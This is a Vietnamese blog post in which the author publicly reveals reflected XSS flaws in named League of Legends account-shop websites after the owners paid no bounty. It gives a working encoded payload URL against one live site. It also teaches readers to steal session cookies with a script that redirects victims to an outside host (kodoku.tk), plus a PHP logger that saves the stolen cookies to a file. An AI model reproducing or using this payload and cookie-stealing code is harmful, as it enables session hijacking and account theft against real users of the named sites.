JABZ7SHOP : Web Selling Things With Cheap Price : https://jabz7shop.blogspot.com/ : Go To My Shop Online Now
Trang chủ
Bài đăng

Tìm hiểu Xss BUG - Share 1 số web shop lmht cho anh em vọc vạch

2 min read

 Đây là lần đầu mình đăng bài, mình chỉ muốn học hỏi thêm mong ae đừng ném đá....và có điều chi sai sót mong ae bỏ qua, xin cảm ơn !

Gần đây dịch bệnh nên cũng chỉ ở nhà ôm Lap. AE biết đấy, không có gì làm thì con người thường trở nên rất nguy hiểm 😄

Ngày 12-3 mình lên mạng search tìm 1 vài web để vọc vạch... Và trời xui đất khiến thì đụng ngay web dính Xss :v

Thế là báo ngay cho ông Admin bên đấy để trình bày lỗi và "rất may" ổng thân thiện nên Bank củng kha khá 😁 ( web top 1 nạp tháng 3 lúc đó là 8 củ ) Ngày hôm sau, cũng như vậy vẩn còn phải nghỉ dịch...thế là mình tiếp tục check bug với mong ước đc nhận bank:3 ahihi

Và đời thật như là mơ ae ạ... (*)

Mình check được 1 list web shop dính XSS trùng nhau. Và tức tốc báo lại cho từng thằng chủ shop bên đấy, thiết nghĩ thế là ấm no mùa dịch bệnh này rồi...Nhưng (*) có cl ý. Sau khi mình báo lỗi: tụi nó thằng thì "ok" đứa thì "ừ đang fix" bé thì "còn lỗi nào nữa k ? ..." Vâng éo có 1 lời cảm ơn luôn 🙁( Cũng khá là cay vì hy vọng hơi nhiều =(( Nhưng củng thôi, không share bug ra ngoài...
Và rồi qua tìm hiểu từ thằng bạn ngành, nó bảo là tụi top GG thường Scam Ads v thôi chứ chả bán gì cả. Tới hom nay, mình vọc chán gòi mà web vẩn chưa fix, nên mình sẽ share cho ae xem thử

List web: shopacc24h.vn accractool.com shopacclmht.vn ...còn nữa... tất cả đều bị như nhau!
Truy cập https://shopacc24h.vn/?sapxep= kèm theo đoạn script đã đc encode %3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E sẽ thấy lỗi Xss!
https://shopacc24h.vn/?sapxep=%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E

Ngoài ra, chia sẽ thêm cho anh em cách chôm cookie:
Cứ như trên, chèn đoạn script này vào ( encode trước khi chèn vào )
<script>
window.location="http://kodoku.tk/test.php?cc="+document.cookie+"&url=http://shopacc24h.vn";
</script>
Sau khi người dùng truy cập đường dẫn, nó sẽ Location đến 1 web mình đã tạo, kèm parameter "cc" và "url"
Vậy là tại trang kodoku.tk/test.php ae code 1 đoạn code nhỏ như sau để lưu cookie và location ngược lại url main!
<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, 'a+');
$bien='Cookie: '.$_REQUEST['cc']."|Location: ".$_REQUEST['url']."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location='".$_REQUEST['url']."';</script>");
?>
Dị là cookie của user click link trên đã lưu lại vào file cookie.txt kodoku.tk/cookie.txt 1 😃 nó là một trong những cách khai thác lỗi Xss...Cảm ơn ae đã đọc

00:00 / 00:00

Bạn có thể thích những bài đăng này

Đăng nhận xét